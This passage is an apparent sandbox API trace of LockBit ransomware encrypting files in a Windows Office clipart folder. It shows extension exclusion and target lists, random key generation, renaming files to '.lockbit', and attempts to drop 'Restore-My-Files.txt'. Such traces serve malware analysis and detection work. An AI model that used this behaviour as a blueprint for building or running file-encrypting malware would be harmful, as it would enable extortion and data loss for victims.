returned 1 [0181.002] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0181.002] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0181.002] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0181.002] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0181.002] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0181.003] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0181.003] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0181.003] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0181.003] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0181.003] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01749_.GIF") returned -1 [0181.004] lstrcmpiW (lpString1="ntldr", lpString2="WB01749_.GIF") returned -1 [0181.004] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01749_.GIF") returned -1 [0181.004] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01749_.GIF") returned -1 [0181.004] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01749_.GIF") returned -1 [0181.004] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01749_.GIF") returned -1 [0181.004] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01749_.GIF") returned -1 [0181.004] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0181.004] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01749_.GIF") returned=".GIF" [0181.004] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0181.004] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0181.004] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0181.004] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0181.004] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0181.004] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0181.004] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0181.004] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0181.004] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0181.004] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0181.004] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0181.004] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0181.004] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0181.004] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0181.004] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0181.004] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0181.005] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0181.005] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0181.005] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0181.005] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0181.005] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0181.005] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0181.005] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0181.005] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0181.005] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0181.005] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0181.005] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0181.005] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0181.005] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01749_.GIF.lockbit") returned 72 [0181.005] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01749_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01749_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0181.007] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0181.007] malloc (_Size=0x40068) returned 0x3df0008 [0181.007] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=948) returned 1 [0181.007] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.007] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0181.007] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.008] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.008] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0181.008] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0181.010] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01749_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01749_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0181.010] malloc (_Size=0xa6) returned 0x1fa2ed8 [0181.010] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0181.012] free (_Block=0x1fa2ed8) [0181.012] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01749_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0181.012] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0181.012] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0181.012] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x207f7b00, ftCreationTime.dwHighDateTime=0x1bd4e69, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x207f7b00, ftLastWriteTime.dwHighDateTime=0x1bd4e69, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01750_.GIF", cAlternateFileName="")) returned 1 [0181.012] lstrcmpiW (lpString1=".", lpString2="WB01750_.GIF") returned -1 [0181.012] lstrcmpiW (lpString1="..", lpString2="WB01750_.GIF") returned -1 [0181.012] PathFindExtensionW (pszPath="WB01750_.GIF") returned=".GIF" [0181.012] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0181.012] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0181.012] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0181.012] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0181.012] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0181.013] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0181.013] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0181.013] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0181.013] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0181.013] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0181.013] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0181.013] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0181.013] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0181.013] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0181.013] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0181.013] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0181.013] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0181.013] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0181.013] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0181.013] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0181.013] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0181.013] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0181.013] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0181.013] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0181.014] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0181.014] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0181.014] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0181.014] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0181.014] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01750_.GIF") returned -1 [0181.014] lstrcmpiW (lpString1="ntldr", lpString2="WB01750_.GIF") returned -1 [0181.015] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01750_.GIF") returned -1 [0181.015] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01750_.GIF") returned -1 [0181.015] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01750_.GIF") returned -1 [0181.015] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01750_.GIF") returned -1 [0181.015] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01750_.GIF") returned -1 [0181.015] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0181.015] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01750_.GIF") returned=".GIF" [0181.015] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0181.015] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0181.015] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0181.015] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0181.015] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0181.015] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0181.015] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0181.015] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0181.015] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0181.015] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0181.015] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0181.015] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0181.015] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0181.015] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0181.015] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0181.015] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0181.015] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0181.015] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0181.015] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0181.016] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0181.016] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0181.016] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0181.016] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0181.016] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0181.016] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0181.016] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0181.016] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0181.016] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0181.016] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01750_.GIF.lockbit") returned 72 [0181.016] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01750_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01750_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0181.017] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0181.017] malloc (_Size=0x40068) returned 0x1ff1e60 [0181.018] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1172) returned 1 [0181.018] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.018] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0181.018] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.019] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0181.019] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0181.021] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01750_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01750_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0181.021] malloc (_Size=0xa6) returned 0x1fa2ed8 [0181.021] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0181.025] free (_Block=0x1fa2ed8) [0181.025] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01750_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0181.025] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0181.025] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0181.025] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cebf400, ftCreationTime.dwHighDateTime=0x1bd4e69, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1cebf400, ftLastWriteTime.dwHighDateTime=0x1bd4e69, nFileSizeHigh=0x0, nFileSizeLow=0x3b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01751_.GIF", cAlternateFileName="")) returned 1 [0181.025] lstrcmpiW (lpString1=".", lpString2="WB01751_.GIF") returned -1 [0181.025] lstrcmpiW (lpString1="..", lpString2="WB01751_.GIF") returned -1 [0181.025] PathFindExtensionW (pszPath="WB01751_.GIF") returned=".GIF" [0181.025] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0181.025] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0181.026] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0181.026] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0181.026] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0181.026] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0181.026] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0181.026] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0181.026] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0181.026] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0181.026] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0181.026] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0181.026] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0181.026] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0181.026] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0181.026] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0181.026] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0181.026] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0181.026] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0181.026] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0181.026] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0181.026] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0181.026] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0181.026] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0181.026] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0181.027] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0181.027] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0181.027] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0181.027] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0181.028] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0181.028] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0181.028] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01751_.GIF") returned -1 [0181.028] lstrcmpiW (lpString1="ntldr", lpString2="WB01751_.GIF") returned -1 [0181.029] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01751_.GIF") returned -1 [0181.029] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01751_.GIF") returned -1 [0181.029] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01751_.GIF") returned -1 [0181.029] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01751_.GIF") returned -1 [0181.029] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01751_.GIF") returned -1 [0181.029] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0181.029] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01751_.GIF") returned=".GIF" [0181.029] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0181.029] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0181.029] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0181.029] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0181.029] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0181.029] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0181.029] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0181.029] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0181.029] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0181.029] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0181.029] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0181.029] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0181.029] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0181.029] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0181.029] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0181.029] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0181.029] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0181.029] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0181.029] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0181.029] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0181.030] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0181.030] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0181.030] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0181.030] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0181.030] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0181.030] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0181.030] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0181.030] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0181.030] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01751_.GIF.lockbit") returned 72 [0181.030] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01751_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01751_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0181.031] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0181.031] malloc (_Size=0x40068) returned 0x3d70450 [0181.031] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=953) returned 1 [0181.031] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.032] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0181.032] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.033] BCryptGenRandom (in: 